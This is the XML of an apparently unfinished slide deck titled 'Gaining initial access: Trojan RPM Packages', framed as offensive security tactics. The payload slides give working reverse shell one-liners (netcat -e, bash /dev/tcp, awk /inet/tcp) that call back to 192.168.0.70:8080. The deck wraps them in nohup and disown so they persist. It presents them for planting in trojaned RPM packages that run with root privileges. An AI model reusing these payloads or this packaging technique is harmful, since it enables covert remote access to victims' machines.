      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="92750"/>
          <a:ext cx="4320363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Overview of RPM installation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="127335"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9856F480-59A0-4C90-B7C9-E6EBF420C3A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="153563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1803"/>
              <a:satOff val="-873"/>
              <a:lumOff val="-5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2F50E-4A12-4D0F-B75A-92C00D7CB633}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="1181390"/>
          <a:ext cx="4320363" cy="708480"/>
        </a:xfrm>
        <a:prstGeom prst="round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Components of RPM package</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="1215975"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3064F9D5-0F57-470F-AF26-5C29C8F66447}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="262427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1981C-9058-4E5E-918F-91B2EDA979C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="2270030"/>
          <a:ext cx="4320363" cy="70848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How to Trojan an RPM</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="2304615"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7CED1E0A-76CA-4294-8D25-9348075726F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="371290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5410"/>
              <a:satOff val="-2618"/>
              <a:lumOff val="-1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11570-4645-4DDF-9D1B-D1E7F7CEFD52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="3358670"/>
          <a:ext cx="4320363" cy="708480"/>
        </a:xfrm>
        <a:prstGeom prst="round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Persistent Payloads</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="3393255"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{44AA433A-56FF-4851-8F4D-4E2B56041CE1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="480154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70697-3FB5-4433-8A9C-311E58943FA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="4447309"/>
          <a:ext cx="4320363" cy="70848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Putting it all together</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="4481894"/>
        <a:ext cx="425119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8876D-30EA-4E6D-A641-91F2C90D7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r="6523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7662" y="-3"/>
            <a:ext cx="12192001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75CF9-BD83-489B-9DC2-89FCEC12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Gaining initial access: Trojan RPM Packages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F50E2-9FAC-4D60-98A0-6FEC22A36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Offensive Security Tactics for Linux Professionals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187-4EE3-4414-9EE8-A1DFD665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Persistent payload 2 – Bash reverse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8B80-3B18-4D68-8003-75A63006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nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/192.168.0.70/8080 0&gt;&amp;1 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239003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187-4EE3-4414-9EE8-A1DFD665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Persistent payload 2 – Bash reverse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8B80-3B18-4D68-8003-75A63006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nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/192.168.0.70/8080 0&gt;&amp;1 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317714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187-4EE3-4414-9EE8-A1DFD665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Persistent payload 3 – Awk one liner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8B80-3B18-4D68-8003-75A63006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nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> awk 'BEGIN {s = "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>inet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/0/192.168.0.70/8080"; while(42) { do{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> "shell&gt;" |&amp; s; s |&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> c; if(c){ while ((c |&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' &gt; /dev/null 2&gt;&amp;1 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10495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6D84-9518-4927-A006-581DF5A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Perhaps an embedded video which will show the target downloading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>the payload.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CAF-5667-4411-824B-725299B6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2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61426-7251-400E-8B31-C5E7B9E9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/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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B648D2E-DEB7-470A-AAE2-B2B3B8A2B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164684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15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B067-725C-49BA-B0CA-2D52CE9D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Overview of RPM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544A-EBCC-49A6-9DB5-79D0B973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RPM is the CentOS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Redhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> package manager and structure of Linux package which is supported by these types of Linux Distributions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>RPM packages can be installed as standalone packages which contain all source code for the program, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>makefiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> including other components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>RPM requires root privileges to run therefore compromise of a target via the RPM route it is possible to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130628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6D499-02DC-4213-BC10-8D793ADE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Components of an RPM package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 6" descr="Gears">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85B8032-3294-4FA1-86F3-F2E8B3D0A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955" y="723900"/>
            <a:ext cx="3466090" cy="3466090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1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143A-959F-48C4-92F9-5E12A36B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Fancy diagram goes in this slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28880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FEE7-3C4F-498C-A237-CB6C3261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Persistent/Automated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222B-FBB4-4E2B-8F7B-BC9DB11E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examples  about persistent payloads…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399878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FEE7-3C4F-498C-A237-CB6C3261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a persistent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222B-FBB4-4E2B-8F7B-BC9DB11E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payload which allows continuous access to the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Common payloads which involve reverse shells can be easily killed using accidental calls of SIGKILL or lack of configuration to prevent SIGKILL from causing a killed connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Persistent payloads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25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187-4EE3-4414-9EE8-A1DFD665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payload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8B80-3B18-4D68-8003-75A63006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nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> -e /bin/bash 192.168.0.70 8080 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230102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187-4EE3-4414-9EE8-A1DFD665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payload 1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8B80-3B18-4D68-8003-75A63006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Nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> – No hang up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Disown – Detach from parent process preventing the process to be frozen up.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26346819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Univers Condensed</vt:lpstr>
      <vt:lpstr>ChronicleVTI</vt:lpstr>
      <vt:lpstr>Gaining initial access: Trojan RPM Packages</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Overview of RPM installation</vt:lpstr>
      <vt:lpstr>Components of an RPM package</vt:lpstr>
      <vt:lpstr>Fancy diagram goes in this slide.</vt:lpstr>
      <vt:lpstr>Persistent/Automated Payloads</vt:lpstr>
      <vt:lpstr>What is a persistent payload</vt:lpstr>
      <vt:lpstr>Persistent payload 1</vt:lpstr>
      <vt:lpstr>Persistent payload 1 explained</vt:lpstr>
      <vt:lpstr>Persistent payload 2 – Bash reverse shell</vt:lpstr>
      <vt:lpstr>Persistent payload 2 – Bash reverse shell</vt:lpstr>
      <vt:lpstr>Persistent payload 3 – Awk one liner</vt:lpstr>
      <vt:lpstr>Perhaps an embedded video which will show the target downloading the payload.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initial access: Trojan RPM Packages</dc:title>
  <dc:creator>Aqeeb Hussain</dc:creator>
  <cp:lastModifiedBy>Aqeeb Hussain</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-12T00:04:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-19T11:12:40Z</dcterms:modified>
</cp:coreProperties>
</file>